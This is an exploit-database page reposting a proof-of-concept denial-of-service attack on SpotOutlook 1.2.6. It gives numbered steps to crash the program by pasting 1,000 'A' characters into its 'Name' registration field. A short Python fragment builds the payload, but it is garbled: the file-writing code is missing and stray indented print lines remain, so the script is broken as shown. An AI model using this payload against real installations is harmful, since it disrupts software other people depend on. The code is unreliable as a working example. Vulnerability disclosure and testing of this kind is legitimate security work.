Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

SpotOutlook 1.2.6 Denial Of Service
# Exploit Title: SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC)
# Exploit Author: Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage :
# Link Software :
# Tested on OS: Windows 10
# CVE : N/A

Proof of Concept (PoC):

1.Download and install SpotOutlook
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.SpotOutlook Crashed

buffer = "A" * 1000
payload = buffer
    print("[+] Creating %s bytes evil payload." %len(payload))
    print("[+] File created!")
    print("File cannot be created.")

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.